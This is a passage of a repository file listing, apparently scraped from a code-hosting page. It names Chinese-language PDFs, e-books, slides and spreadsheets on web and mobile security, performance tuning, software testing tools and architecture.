ago\n\t\t\t\t移动安全威胁分析和安全建设.pdf\t2019/3/files/安全/1-5-内建安全的软件开发-刘庆华.pdf\t14 months ago\n\t\t\t\t移动应用是如何通过WebView窃取你的隐私的.pdf\t2019\\3\\files\\安全\\TalkingData 2017+十一月电商广告热点榜单.pdf\t14 months ago\n\t\t\t\t移动恶意代码威胁的针对性泛化思考.pdf\t2019\\3\\files\\安全\\ISC 2018 DevSecOps.pdf\t14 months ago\n\t\t\t\t端口渗透.pdf\t2019\\3\\files\\安全\\API 平台的安全实践.pdf\t14 months ago\n\t\t\t\t细数安卓 APP 那些远程攻击漏洞.pdf\t2019\\3\\files\\安全\\TalkingData 2017+十一月电商广告热点榜单.pdf\t14 months ago\n\t\t\t\t网络安全北向技术和方法探究.pdf\t2019\\3\\files\\安全\\ISC 2018 DevSecOps.pdf\t14 months ago\n\t\t\t\t网络游戏安全揭密.pdf\t2019/3/files/运维/Aomi_Pay_Threat_Model.tm7\t14 months ago\n\t\t\t\t让我们做Web安全测试吧.pdf\t2019\\3\\files\\安全\\vipread.com_信息安全研究2019.5.1.zip\t14 months ago\n\t\t\t\t谈谈安卓的 Intent 注入.pdf\t2019\\3\\files\\安全\\TalkingData 2017+十一月电商广告热点榜单.pdf\t14 months ago\n\t\t\t\t金融科技助力支付安全.pdf\t2019\\3\\files\\安全\\ISC 2018 DevSecOps.pdf\t14 months ago\n\t\t\t\t阿里云合作伙伴研发-安全开发规范.pdf\t2019/3/files/运维/Aomi_Pay_Threat_Model.tm7\t14 months ago\n\t\t\t\t阿里云威胁检测实践.pdf\t2019\\3\\files\\安全\\不可忽视的业务安全问题-唯品会.pdf\t14 months ago\n\t\t\t\t陈建 企业信息安全实践 ISC2018.pdf\t2019\\3\\files\\安全\\ISC 2018 DevSecOps.pdf\t14 months ago\n\t\t\t\t面向全流量的网络APT智能检测方法.pdf\t2019\\3\\files\\安全\\ISC 2018 DevSecOps.pdf\t14 months ago\n\n\t\t\t\tDisruptor+入门+-+v1.0.pdf\t2019/3/files/性能/Disruptor+入门+-+v1.0.pdf\t14 months ago\n\t\t\t\tGoogle工作整理术(解读版).epub\t2019\\3\\files\\性能\\Google工作整理术(解读版).epub\t13 months ago\n\t\t\t\tJMeter中文教程.pdf\t2019/3/files/性能/Disruptor+入门+-+v1.0.pdf\t14 months ago\n\t\t\t\tJMeter使用技巧.doc\t2019/3/files/性能/Disruptor+入门+-+v1.0.pdf\t14 months ago\n\t\t\t\tJProfiler入门教程-1.1.pdf\t2019/3/files/性能/Disruptor+入门+-+v1.0.pdf\t14 months ago\n\t\t\t\tJava 8函数式编程 (图灵程序设计丛书).epub\t2019\\3\\files\\性能\\Google工作整理术(解读版).epub\t13 months ago\n\t\t\t\tJava性能权威指南 (图灵程序设计丛书).epub\t2019\\3\\files\\性能\\Google工作整理术(解读版).epub\t13 months ago\n\t\t\t\tJmeter新手入门.docx\t2019/3/files/性能/Disruptor+入门+-+v1.0.pdf\t14 months ago\n\t\t\t\tPerformance_Matters_v3(Chinese).pptx\t2019/3/files/性能/Disruptor+入门+-+v1.0.pdf\t14 months ago\n\t\t\t\tSpring实战(第4版).epub\t2019\\3\\files\\性能\\Spring实战(第4版).epub\t13 months ago\n\t\t\t\tVega3_Specs_v1.pdf\t2019\\3\\files\\性能\\Vega3_Specs_v1.pdf\t13 months ago\n\t\t\t\tVim实用技巧:使用模式入门篇(第2版).epub\t2019\\3\\files\\性能\\Google工作整理术(解读版).epub\t13 months ago\n\t\t\t\tWP - JVM Performance Study.pdf\t2019\\3\\files\\性能\\Vega3_Specs_v1.pdf\t13 months ago\n\t\t\t\tZing_Performance_eBook_v1.pdf\t2019\\3\\files\\性能\\Vega3_Specs_v1.pdf\t13 months ago\n\t\t\t\t使用Jmeter进行性能测试.pdf\t2019/3/files/性能/Disruptor+入门+-+v1.0.pdf\t14 months ago\n\t\t\t\t利用JMeter进行Web测试.ppt\t2019/3/files/性能/Disruptor+入门+-+v1.0.pdf\t14 months ago\n\t\t\t\t程序员必读之软件架构.epub\t2019\\3\\files\\性能\\Google工作整理术(解读版).epub\t13 months ago\n\t\t\t\t编写高质量代码之Java.epub\t2019\\3\\files\\性能\\Spring实战(第4版).epub\t13 months ago\n\t\t\t\t编程珠玑(第2版·修订版) - [美]乔恩·本特利.epub\t2019\\3\\files\\性能\\Google工作整理术(解读版).epub\t13 months ago\n\t\t\t\t重来2:更为简单高效的远程工作方式.epub\t2019\\3\\files\\性能\\Google工作整理术(解读版).epub\t13 months ago\n\n\n\t\t\t\t课件\t2019/3/files/抢救你的学习力/抢救你的学习力 目的篇.txt\t14 months ago\n\t\t\t\t抢救你的学习力 目的篇.txt\t2019/3/files/抢救你的学习力/抢救你的学习力 目的篇.txt\t14 months ago\n\t\t\t\t抢救你的学习力(三、记忆力).doc\t2019/3/files/抢救你的学习力/抢救你的学习力 目的篇.txt\t14 months ago\n\t\t\t\t抢救你的学习力(二、注意力).doc\t2019/3/files/抢救你的学习力/抢救你的学习力 目的篇.txt\t14 months ago\n\t\t\t\t抢救你的学习力(五、谈发展)(完).doc\t2019/3/files/抢救你的学习力/抢救你的学习力 目的篇.txt\t14 months ago\n\t\t\t\t抢救你的学习力(四、思维力).doc\t2019/3/files/抢救你的学习力/抢救你的学习力 目的篇.txt\t14 months ago\n\n\n\t\t\t\t2018年美团点评技术年货(上).pdf\t2019\\3\\files\\架構\\2018年美团点评技术年货(上).pdf\t14 months ago\n\t\t\t\t2018年美团点评技术年货(下).pdf\t2019\\3\\files\\架構\\2018年美团点评技术年货(上).pdf\t14 months ago\n\t\t\t\t\n\t\t\t\t杭州第二届测试沙龙PPT\t2019/3/files/测试/杭州第二届测试沙龙PPT/1全链路压测实践(终稿).pdf\t14 months ago\n\t\t\t\t软件测试\t2019/3/files/测试/软件测试/02 客户的需求观.pdf\t14 months ago\n\t\t\t\t(已加+终)百度持续交付之旅_沙龙稿.pdf\t2019/3/files/测试/(已加+终)百度持续交付之旅_沙龙稿.pdf\t14 months ago\n\t\t\t\t038. 长尾理论.pdf\t2019/3/files/前端/如何构建高质量、高效率的前端体系 zhuoying.pptx\t14 months ago\n\t\t\t\t20061031_3GSS_NSFT_业务管理_测试用例.xls\t2019/3/files/测试/20061031_3GSS_NSFT_业务管理_测试用例.xls\t14 months ago\n\t\t\t\t20061031_3GSS_NSFT_预警执行和展示_测试用例.xls\t2019/3/files/测试/20061031_3GSS_NSFT_业务管理_测试用例.xls\t14 months ago\n\t\t\t\t20061031_3GSS_NSFT_预警配置与审核_测试用例.xls\t2019/3/files/测试/20061031_3GSS_NSFT_业务管理_测试用例.xls\t14 months ago\n\t\t\t\t2007年QA典型百大MISSBUG总结.doc\t2019/3/files/测试/2007年QA典型百大MISSBUG总结.doc\t14 months ago\n\t\t\t\t2018技术趋势.pdf\t2019/3/files/测试/(已加+终)百度持续交付之旅_沙龙稿.pdf\t14 months ago\n\t\t\t\t58到家测试环境治理-范令凯.pdf\t2019/3/files/测试/(已加+终)百度持续交付之旅_沙龙稿.pdf\t14 months ago\n\t\t\t\tAPI+Everything+–+饿了么基于效率提升的API架构.pdf\t2019/3/files/前端/如何构建高质量、高效率的前端体系 zhuoying.pptx\t14 months ago\n\t\t\t\tAPI权限控制与安全管理.doc\t2019/3/files/测试/API权限控制与安全管理.doc\t14 months ago\n\t\t\t\tAPI架构演进.pdf\t2019/3/files/测试/(已加+终)百度持续交付之旅_沙龙稿.pdf\t14 months ago\n\t\t\t\tAPI测试case.xlsx\t2019/3/files/测试/2007年QA典型百大MISSBUG总结.doc\t14 months ago\n\t\t\t\tAdobe Photoshop CC 2017图像处理教程.epub\t2019\\3\\files\\性能\\Google工作整理术(解读版).epub\t13 months ago\n\t\t\t\tApp快速自动化回归测试体系.pdf\t2019\\3\\files\\测试\\App快速自动化回归测试体系.pdf\t14 months ago\n\t\t\t\tAutoCAD自动化测试数据挖掘:提高自动化测试效率.pdf\t2019\\3\\files\\测试\\App快速自动化回归测试体系.pdf\t14 months ago\n\t\t\t\tC1000K.ppt\t2019/3/files/测试/C1000K.ppt\t14 months ago\n\t\t\t\tDevOps下的质保测试方法.pdf\t2019/3/files/测试/(已加+终)百度持续交付之旅_沙龙稿.pdf\t14 months ago\n\t\t\t\tExcel2010培训教程(入门)--目前最全的基础培训教材.ppt\t2019/3/files/后端/《Java多线程编程核心技术》源代码/07 第七章/threadRunSyn/src/test/run/R…\t14 months ago\n\t\t\t\tFiddler调试权威指南 (美)劳伦斯著.pdf\t2019/3/files/后端/30种java技术框架-方案架构图汇总.pdf\t14 months ago\n\t\t\t\tFiddler调试权威指南+(美)劳伦斯著.pdf\t2019/3/files/测试/Fiddler调试权威指南+(美)劳伦斯著.pdf\t14 months ago\n\t\t\t\tFindBugs安装及使用说明.docx\t2019/3/files/测试/2007年QA典型百大MISSBUG总结.doc\t14 months ago\n\t\t\t\tFuzzing 测试技术综述.pdf\t2019/3/files/后端/30种java技术框架-方案架构图汇总.pdf\t14 months ago\n\t\t\t\tFuzzing-模糊测试--强制性安全漏洞发掘.doc\t2019/3/files/测试/API权限控制与安全管理.doc\t14 months ago\n\t\t\t\tJAVA性能调优--内存管理.pptx\t2019/3/files/测试/API权限控制与安全管理.doc\t14 months ago\n\t\t\t\tJMeter使用技巧.doc\t2019/3/files/测试/2007年QA典型百大MISSBUG总结.doc\t14 months ago\n\t\t\t\tJProfiler入门教程-1.1.pdf\t2019/3/files/测试/Linux命令行与shell脚本编程大全.第3版.pdf\t14 months ago\n\t\t\t\tJVM分享 Java Program in Action ——Java程序癿编译、加载不执行.pdf\t2019/3/files/测试/(已加+终)百度持续交付之旅_沙龙稿.pdf\t14 months ago\n\t\t\t\tJava企业应用 性能优化 原则 , 方法 与 策略.pdf\t2019/3/files/测试/(已加+终)百度持续交付之旅_沙龙稿.pdf\t14 months ago\n\t\t\t\tJava性能优化指南, 及唯品会的实战.pdf\t2019/3/files/测试/(已加+终)百度持续交付之旅_沙龙稿.pdf\t14 months ago\n\t\t\t\tJmeter新手入门.docx\t2019/3/files/测试/2007年QA典型百大MISSBUG总结.doc\t14 months ago\n\t\t\t\tLaTeX大家来学.pdf\t2019/3/files/后端/30种java技术框架-方案架构图汇总.pdf\t14 months ago\n\t\t\t\tLinux Shell脚本攻略.pdf\t2019/3/files/测试/Linux命令行与shell脚本编程大全.第3版.pdf\t14 months ago\n\t\t\t\tLinux命令行与shell脚本编程大全.第3版.pdf\t2019/3/files/测试/Linux命令行与shell脚本编程大全.第3版.pdf\t14 months ago\n\t\t\t\tLoadRunner_Winsocket协议知识总结V1.1(修正版).pdf\t2019/3/files/测试/LoadRunner_Winsocket协议知识总结V1.1(修正版).pdf\t14 months ago\n\t\t\t\tLoadRunner函数大全之中文解释.doc\t2019/3/files/测试/2007年QA典型百大MISSBUG总结.doc\t14 months ago\n\t\t\t\tLoadRunner函数大全之中文解释.pdf\t2019/3/files/测试/LoadRunner_Winsocket协议知识总结V1.1(修正版).pdf\t14 months ago\n\t\t\t\tLoadRunner压力测试实例.doc\t2019/3/files/后端/《Java多线程编程核心技术》源代码/07 第七章/threadRunSyn/src/test/run/R…\t14 months ago\n\t\t\t\tLoadrunner脚本开发规范 .doc\t2019/3/files/测试/2007年QA典型百大MISSBUG总结.doc\t14 months ago\n\t\t\t\tMicroservice_security.pdf\t2019/3/files/后端/30种java技术框架-方案架构图汇总.pdf\t14 months ago\n\t\t\t\tNginx开发从入门到精通.pdf\t2019/3/files/测试/LoadRunner_Winsocket协议知识总结V1.1(修正版).pdf\t14 months ago\n\t\t\t\tOSGI入门与实践.pptx\t2019/3/files/测试/OSGI入门与实践.pptx\t14 months ago\n\t\t\t\tOWASP Top 10 2017 10项最严重的 Web 应用程序安全风险.pdf\t2019/3/files/后端/30种java技术框架-方案架构图汇总.pdf\t14 months ago\n\t\t\t\tOWASP-mobile-安全测试-APK.ppt\t2019/3/files/测试/OSGI入门与实践.pptx\t14 months ago\n\t\t\t\tOWASP测试指南(中文).doc\t2019/3/files/测试/2007年QA典型百大MISSBUG总结.doc\t14 months ago\n\t\t\t\tPMD使用说明.doc\t2019/3/files/测试/2007年QA典型百大MISSBUG总结.doc\t14 months ago\n\t\t\t\tPTR140-liuguoqiang.ppt\t2019/3/files/测试/C1000K.ppt\t14 months ago\n\t\t\t\tPTS-5-2-1-01.doc\t2019/3/files/测试/C1000K.ppt\t14 months ago\n\t\t\t\tPeach+Fuzzer+官方文档中文版.doc\t2019/3/files/测试/2007年QA典型百大MISSBUG总结.doc\t14 months ago\n\t\t\t\tPerformance_Matters_v3(Chinese).pptx\t2019/3/files/测试/2007年QA典型百大MISSBUG总结.doc\t14 months ago\n\t\t\t\tPre-briefingAM.ppt\t2019/3/files/测试/C1000K.ppt\t14 months ago\n\t\t\t\tQTP9.0编程常用方法及实例心得.doc\t2019/3/files/测试/2007年QA典型百大MISSBUG总结.doc\t14 months ago\n\t\t\t\tREST API安全测试的思路.pdf\t2019/3/files/测试/LoadRunner_Winsocket协议知识总结V1.1(修正版).pdf\t14 months ago\n\t\t\t\tRobotFramework 自动化测试框架安装手册.docx\t2019/3/files/测试/2007年QA典型百大MISSBUG总结.doc\t14 months ago\n\t\t\t\tSSE_TT01测试计划.xls\t2019/3/files/测试/20061031_3GSS_NSFT_业务管理_测试用例.xls\t14 months ago\n\t\t\t\tSSE_TT02测试大纲.xls\t2019/3/files/测试/20061031_3GSS_NSFT_业务管理_测试用例.xls\t14 months ago\n\t\t\t\tSSE_TT03测试用例.xls\t2019/3/files/测试/20061031_3GSS_NSFT_业务管理_测试用例.xls\t14 months ago\n\t\t\t\tSSE_TT04测试问题卡.xls\t2019/3/files/测试/20061031_3GSS_NSFT_业务管理_测试用例.xls\t14 months ago\n\t\t\t\tSSE_TT05测试总结报告.xls\t2019/3/files/测试/20061031_3GSS_NSFT_业务管理_测试用例.xls\t14 months ago\n\t\t\t\tSSE_TT06性能测试报告.xls\t2019/3/files/测试/20061031_3GSS_NSFT_业务管理_测试用例.xls\t14 months ago\n\t\t\t\tSelenium自动化测试:基于 Python 语言(异步图书).epub\t2019\\3\\files\\性能\\Google工作整理术(解读版).epub\t13 months ago\n\t\t\t\tSpecification by Example(实例化需求).pdf\t2019/3/files/测试/Fiddler调试权威指南+(美)劳伦斯著.pdf\t14 months ago\n\t\t\t\tThe Cucumber Book.pdf\t2019/3/files/后端/30种java技术框架-方案架构图汇总.pdf\t14 months ago\n\t\t\t\tThreat Modeling Tool 2016 Getting Started Guide.docx\t2019/3/files/测试/2007年QA典型百大MISSBUG总结.doc\t14 months ago\n\t\t\t\tThreat Modeling Tool 2016 User Guide.docx\t2019/3/files/测试/2007年QA典型百大MISSBUG总结.doc\t14 months ago\n\t\t\t\tTomcat安装、配置、优化及负载均衡详解@www.java1234.com.docx\t2019/3/files/测试/2007年QA典型百大MISSBUG总结.doc\t14 months ago\n\t\t\t\tUI测试.pdf\t2019/3/files/测试/(已加+终)百度持续交付之旅_沙龙稿.pdf\t14 months ago\n\t\t\t\tWEB代码审计与渗透测试.ppt\t2019/3/files/测试/2007年QA典型百大MISSBUG总结.doc\t14 months ago\n\t\t\t\tWEB安全性测试测试用例(基础).doc\t2019/3/files/测试/2007年QA典型百大MISSBUG总结.doc\t14 months ago\n\t\t\t\tWeb API 安全漏洞与检测防护.pdf\t2019/3/files/后端/30种java技术框架-方案架构图汇总.pdf\t14 months ago\n\t\t\t\tWeb——安全性测试.docx\t2019/3/files/后端/《Java多线程编程核心技术》源代码/07 第七章/threadRunSyn/src/test/run/R…\t14 months ago\n\t\t\t\tWeb安全性测试.docx\t2019/3/files/后端/《Java多线程编程核心技术》源代码/07 第七章/threadRunSyn/src/test/run/R…\t14 months ago\n\t\t\t\tWeb安全测试规范.doc\t2019/3/files/测试/2007年QA典型百大MISSBUG总结.doc\t14 months ago\n\t\t\t\tWeb安全测试规范V1.3.doc\t2019/3/files/测试/2007年QA典型百大MISSBUG总结.doc\t14 months ago\n\t\t\t\tWeb应用安全开发规范-V1.5.doc\t2019/3/files/测试/2007年QA典型百大MISSBUG总结.doc\t14 months ago\n\t\t\t\tWireShark 过滤语法.doc\t2019/3/files/测试/2007年QA典型百大MISSBUG总结.doc\t14 months ago\n\t\t\t\t[www.java1234.com]selenium2初学者快速入门(Java).docx\t2019/3/files/测试/2007年QA典型百大MISSBUG总结.doc\t14 months ago\n\t\t\t\t[服务器端软件性能分析和诊断].刘雪梅.扫描版.pdf\t2019/3/files/测试/LoadRunner_Winsocket协议知识总结V1.1(修正版).pdf\t14 months ago\n\t\t\t\t[测试驱动开发的3项修炼:走出TDD丛林].王晓毅.扫描版[ED2000.COM].pdf\t2019/3/files/测试/LoadRunner_Winsocket协议知识总结V1.1(修正版).pdf\t14 months ago\n\t\t\t\t[测试驱动开发的艺术].(科斯科拉).李贝.扫描版[ED2000.COM].pdf\t2019/3/files/测试/LoadRunner_Winsocket协议知识总结V1.1(修正版).pdf\t14 months ago\n\t\t\t\t[荐]深入浅出设计模式.pdf\t2019/3/files/测试/LoadRunner_Winsocket协议知识总结V1.1(修正版).pdf\t14 months ago\n\t\t\t\t[软件测试资料].LR9.1Tutorial.doc\t2019/3/files/测试/2007年QA典型百大MISSBUG总结.doc\t14 months ago\n\t\t\t\t[软件测试资料].LR9.1Tutorial.pdf\t2019/3/files/测试/Fiddler调试权威指南+(美)劳伦斯著.pdf\t14 months ago\n\t\t\t\t[轻轻松松自动化测试].朱少民.扫描版.pdf\t2019/3/files/测试/LoadRunner_Winsocket协议知识总结V1.1(修正版).pdf\t14 months ago\n\t\t\t\t[零成本实现WEB性能测试 基于APACHE JMETER].温素剑.扫描版.pdf\t2019/3/files/测试/[零成本实现WEB性能测试 基于APACHE JMETER].温素剑.扫描版.pdf\t14 months ago\n\t\t\t\tapp快速回归测试.pdf\t2019/3/files/测试/(已加+终)百度持续交付之旅_沙龙稿.pdf\t14 months ago\n\t\t\t\tgit菜单.pptx\t2019/3/files/测试/OSGI入门与实践.pptx\t14 months ago\n\t\t\t\tgoogle软件测试之道.pdf\t2019\\3\\files\\性能\\Google工作整理术(解读版).epub\t13 months ago\n\t\t\t\tjenkins中文使用手册.doc\t2019/3/files/测试/Linux命令行与shell脚本编程大全.第3版.pdf\t14 months ago\n\t\t\t\tjira实战零基础从入门到精通@.doc\t2019/3/files/测试/C1000K.ppt\t14 months ago\n\t\t\t\tkotlin从入门到精通快速上手.pdf\t2019/3/files/后端/30种java技术框架-方案架构图汇总.pdf\t14 months ago\n\t\t\t\tngrinder.pdf\t2019/3/files/测试/Linux命令行与shell脚本编程大全.第3版.pdf\t14 months ago\n\t\t\t\toauth2.0.pptx\t2019/3/files/测试/OSGI入门与实践.pptx\t14 months ago\n\t\t\t\towasp安全测试指南V4-测试大纲(中文).xlsx\t2019/3/files/测试/2007年QA典型百大MISSBUG总结.doc\t14 months ago\n\t\t\t\tpeach.pdf\t2019/3/files/后端/30种java技术框架-方案架构图汇总.pdf\t14 months ago\n\t\t\t\tpts-performance-system-cn-zh-2016-06-08.pdf\t2019/3/files/测试/pts-performance-system-cn-zh-2016-06-08.pdf\t14 months ago\n\t\t\t\tsql基础学习.doc\t2019/3/files/测试/C1000K.ppt\t14 months ago\n\t\t\t\tswagger使用文档.docx\t2019/3/files/测试/2007年QA典型百大MISSBUG总结.doc\t14 months ago\n\t\t\t\tweb_PR性能测试工具培训 -实例演示.pptx\t2019/3/files/测试/C1000K.ppt\t14 months ago\n\t\t\t\twebmagic爬虫.pdf\t2019/3/files/后端/30种java技术框架-方案架构图汇总.pdf\t14 months ago\n\t\t\t\tweb产品安全典型案例与测试实战分享.pptx\t2019/3/files/测试/2007年QA典型百大MISSBUG总结.doc\t14 months ago\n\t\t\t\tweb渗透测试用例.xlsx\t2019/3/files/测试/2007年QA典型百大MISSBUG总结.doc\t14 months ago\n\t\t\t\t《图解HTTP》.pdf\t2019/3/files/测试/Linux命令行与shell脚本编程大全.第3版.pdf\t14 months ago\n\t\t\t\t《软测之魂核心测试设计精解》.(肖利琼).[PDF].pdf\t2019/3/files/测试/[零成本实现WEB性能测试 基于APACHE JMETER].温素剑.扫描版.pdf\t14 months ago\n\t\t\t\t一个软件测试 新公式引起的思考.pdf\t2019/3/files/测试/(已加+终)百度持续交付之旅_沙龙稿.pdf\t14 months ago\n\t\t\t\t从 0 开始学习 GitHub 系列.pdf\t2019/3/files/测试/Linux命令行与shell脚本编程大全.第3版.pdf\t14 months ago\n\t\t\t\t从分层复⽤用到⾃自动化测试—看美 团客户端架构的演变.pdf\t2019/3/files/测试/(已加+终)百度持续交付之旅_沙龙稿.pdf\t14 months ago\n\t\t\t\t从分层复用到自动化测试—看美团客户端架构的演变_部分1.pdf\t2019\\3\\files\\测试\\App快速自动化回归测试体系.pdf\t14 months ago\n\t\t\t\t从分层复用到自动化测试—看美团客户端架构的演变_部分2.pdf\t2019\\3\\files\\测试\\App快速自动化回归测试体系.pdf\t14 months ago\n\t\t\t\t代码审计方案.docx\t2019/3/files/测试/2007年QA典型百大MISSBUG总结.doc\t14 months ago\n\t\t\t\t企业级项目的Web自动化测试工程化实践.pptx\t2019/3/files/前端/如何构建高质量、高效率的前端体系 zhuoying.pptx\t14 months ago\n\t\t\t\t使用API网关 快速开放Serverless服务.pdf\t2019/3/files/测试/(已加+终)百度持续交付之旅_沙龙稿.pdf\t14 months ago\n\t\t\t\t分层自动化测试持续集成.pdf\t2019/3/files/测试/(已加+终)百度持续交付之旅_沙龙稿.pdf\t14 months ago\n\t\t\t\t利用JMeter进行Web测试.ppt\t2019/3/files/测试/2007年QA典型百大MISSBUG总结.doc\t14 months ago\n\t\t\t\t压力测试.xmind\t2019/3/files/测试/压力测试.xmind\t14 months ago\n\t\t\t\t压力测试场景.xmind\t2019/3/files/测试/压力测试.xmind\t14 months ago\n\t\t\t\t去哪儿UI自动化持续集成体系.pdf\t2019\\3\\files\\测试\\App快速自动化回归测试体系.pdf\t14 months ago\n\t\t\t\t史上最全的测试用例设计方法总结 (1).doc\t2019/3/files/测试/Linux命令行与shell脚本编程大全.第3版.pdf\t14 months ago\n\t\t\t\t史上最全的测试用例设计方法总结.doc\t2019/3/files/测试/2007年QA典型百大MISSBUG总结.doc\t14 months ago\n\t\t\t\t唯品会质量工程及自动化 体系的演变.pdf\t2019/3/files/测试/(已加+终)百度持续交付之旅_沙龙稿.pdf\t14 months ago\n\t\t\t\t图测-如何打造快速低成本的自动化测试.pdf\t2019\\3\\files\\测试\\App快速自动化回归测试体系.pdf\t14 months ago\n\t\t\t\t图解HTTP 彩色版.pdf\t2019/3/files/测试/Fiddler调试权威指南+(美)劳伦斯著.pdf\t14 months ago\n\t\t\t\t在JMeter中使用变量.doc\t2019/3/files/测试/2007年QA典型百大MISSBUG总结.doc\t14 months ago\n\t\t\t\t基亍交易逻辑建模的 在线测试实践.pdf\t2019/3/files/测试/(已加+终)百度持续交付之旅_沙龙稿.pdf\t14 months ago\n\t\t\t\t基于AI的⽹网易易UI⾃自动化 测试⽅方案与实践.pdf\t2019/3/files/测试/(已加+终)百度持续交付之旅_沙龙稿.pdf\t14 months ago\n\t\t\t\t基于WEB的应用系统安全方案.doc\t2019/3/files/测试/2007年QA典型百大MISSBUG总结.doc\t14 months ago\n\t\t\t\t基于jenkins的持续集成使用指南.docx\t2019/3/files/测试/2007年QA典型百大MISSBUG总结.doc\t14 months ago\n\t\t\t\t基于容器化的环境治理实践-艾辉.pdf\t2019/3/files/测试/(已加+终)百度持续交付之旅_沙龙稿.pdf\t14 months ago\n\t\t\t\t大型Web项目可用性提升 零脚本错误的实战.pdf\t2019\\3\\files\\测试\\App快速自动化回归测试体系.pdf\t14 months ago\n\t\t\t\t如何写有效的bug报告.pdf\t2019/3/files/前端/如何构建高质量、高效率的前端体系 zhuoying.pptx\t14 months ago\n\t\t\t\t如何有效的使用代码覆盖率提高代码质量.pdf\t2019/3/files/测试/(已加+终)百度持续交付之旅_沙龙稿.pdf\t14 months ago\n\t\t\t\t如何进⼀一步提升研发效率.pdf\t2019/3/files/测试/(已加+终)百度持续交付之旅_沙龙稿.pdf\t14 months ago\n\t\t\t\t安全测试考试题目(全).docx\t2019/3/files/测试/2007年QA典型百大MISSBUG总结.doc\t14 months ago\n\t\t\t\t完美测试.pdf\t2019/3/files/测试/[零成本实现WEB性能测试 基于APACHE JMETER].温素剑.扫描版.pdf\t14 months ago\n\t\t\t\t实用且适用的架构设计.pdf\t2019/3/files/测试/(已加+终)百度持续交付之旅_沙龙稿.pdf\t14 months ago\n\t\t\t\t实验3-Web应用程序渗透测试.doc\t2019/3/files/测试/2007年QA典型百大MISSBUG总结.doc\t14 months ago\n\t\t\t\t常用安全性测试用例.doc\t2019/3/files/测试/2007年QA典型百大MISSBUG总结.doc\t14 months ago\n\t\t\t\t开放平台的openapi设计-朱念洋-v4.pptx\t2019/3/files/测试/OSGI入门与实践.pptx\t14 months ago\n\t\t\t\t性能测试从零开始LoadRunner入门与提升.pdf\t2019/3/files/测试/Fiddler调试权威指南+(美)劳伦斯著.pdf\t14 months ago\n\t\t\t\t性能测试报告模板V2.0.doc\t2019/3/files/后端/《Java多线程编程核心技术》源代码/07 第七章/threadRunSyn/src/test/run/R…\t14 months ago\n\t\t\t\t性能测试诊断分析与优化.pptx\t2019/3/files/测试/API权限控制与安全管理.doc\t14 months ago\n\t\t\t\t性能测试过 程实践.pdf\t2019/3/files/测试/(已加+终)百度持续交付之旅_沙龙稿.pdf\t14 months ago\n\t\t\t\t打通IOS自动化的任督二脉.pdf\t2019\\3\\files\\测试\\App快速自动化回归测试体系.pdf\t14 months ago\n\t\t\t\t捍卫电商安全.pdf\t2019/3/files/前端/如何构建高质量、高效率的前端体系 zhuoying.pptx\t14 months ago\n\t\t\t\t接口性能测试报告.docx\t2019/3/files/后端/《Java多线程编程核心技术》源代码/07 第七章/threadRunSyn/src/test/run/R…\t14 months ago\n\t\t\t\t敏捷测试中的工具实现.pdf\t2019/3/files/测试/(已加+终)百度持续交付之旅_沙龙稿.pdf\t14 months ago\n\t\t\t\t极质测试.pdf\t2019/3/files/测试/(已加+终)百度持续交付之旅_沙龙稿.pdf\t14 months ago\n\t\t\t\t构建可靠的自动化发布体系.pdf\t2019/3/files/测试/pts-performance-system-cn-zh-2016-06-08.pdf\t14 months ago\n\t\t\t\t架构本质和大型电商微服务实践.pdf\t2019/3/files/测试/(已加+终)百度持续交付之旅_沙龙稿.pdf\t14 months ago\n\t\t\t\t正交矩阵表一.txt\t2019/3/files/book/畅销80国世界级励志书:不抱怨的世界.txt\t14 months ago\n\t\t\t\t正交矩阵表二.txt\t2019/3/files/book/畅销80国世界级励志书:不抱怨的世界.txt\t14 months ago\n\t\t\t\t测试之美(高清程序员十本必读书之一).pdf\t2019/3/files/测试/Fiddler调试权威指南+(美)劳伦斯著.pdf\t14 months ago\n\t\t\t\t测试团队管理实战.pdf\t2019/3/files/测试/(已加+终)百度持续交付之旅_沙龙稿.pdf\t14 months ago\n\t\t\t\t测试工具开发中的持续集成与持续交付实践.pdf\t2019/3/files/测试/(已加+终)百度持续交付之旅_沙龙稿.pdf\t14 months ago\n\t\t\t\t测试架构的最佳实践.pdf\t2019/3/files/测试/(已加+终)百度持续交付之旅_沙龙稿.pdf\t14 months ago\n\t\t\t\t测试用例_zh.xlsx\t2019/3/files/测试/2007年QA典型百大MISSBUG总结.doc\t14 months ago\n\t\t\t\t测试用例大全.xls\t2019/3/files/测试/20061031_3GSS_NSFT_业务管理_测试用例.xls\t14 months ago\n\t\t\t\t测试用例设计规范.doc\t2019/3/files/测试/2007年QA典型百大MISSBUG总结.doc\t14 months ago\n\t\t\t\t测试知识体系.xmind\t2019/3/files/测试/压力测试.xmind\t14 months ago\n\t\t\t\t测试自动化.doc\t2019/3/files/测试/2007年QA典型百大MISSBUG总结.doc\t14 months ago\n\t\t\t\t测试输入字典.doc\t2019/3/files/测试/(已加+终)百度持续交付之旅_沙龙稿.pdf\t14 months ago\n\t\t\t\t淘宝开放平台网关技术揭密.pdf\t2019/3/files/测试/(已加+终)百度持续交付之旅_沙龙稿.pdf\t14 months ago\n\t\t\t\t王磊_面向互联网的性能测试案例分享.pdf\t2019/3/files/测试/Fiddler调试权威指南+(美)劳伦斯著.pdf\t14 months ago\n\t\t\t\t百度Elasticsearch实践-高攀.pptx\t2019/3/files/测试/OSGI入门与实践.pptx\t14 months ago\n\t\t\t\t知乎测试环境建设-徐实.pdf\t2019/3/files/测试/(已加+终)百度持续交付之旅_沙龙稿.pdf\t14 months ago\n\t\t\t\t移动APP测试的22条军规.pdf\t2019/3/files/测试/(已加+终)百度持续交付之旅_沙龙稿.pdf\t14 months ago\n\t\t\t\t移动app测试实战.pdf\t2019/3/files/测试/Fiddler调试权威指南+(美)劳伦斯著.pdf\t14 months ago\n\t\t\t\t移动互联网App测试流程及测试点.docx\t2019/3/files/测试/(已加+终)百度持续交付之旅_沙龙稿.pdf\t14 months ago\n\t\t\t\t移动客户端通用测试.xmind\t2019/3/files/测试/压力测试.xmind\t14 months ago\n\t\t\t\t移动应用安全检测-系统测试用例-V1.0.docx\t2019/3/files/测试/2007年QA典型百大MISSBUG总结.doc\t14 months ago\n\t\t\t\t移动测试体系.pdf\t2019/3/files/测试/(已加+终)百度持续交付之旅_沙龙稿.pdf\t14 months ago\n\t\t\t\t移动测试智能化 助力高质量App生态体系.pdf\t2019/3/files/测试/pts-performance-system-cn-zh-2016-06-08.pdf\t14 months ago\n\t\t\t\t移动端全链路跟踪保障体系.pdf\t2019\\3\\files\\测试\\App快速自动化回归测试体系.pdf\t14 months 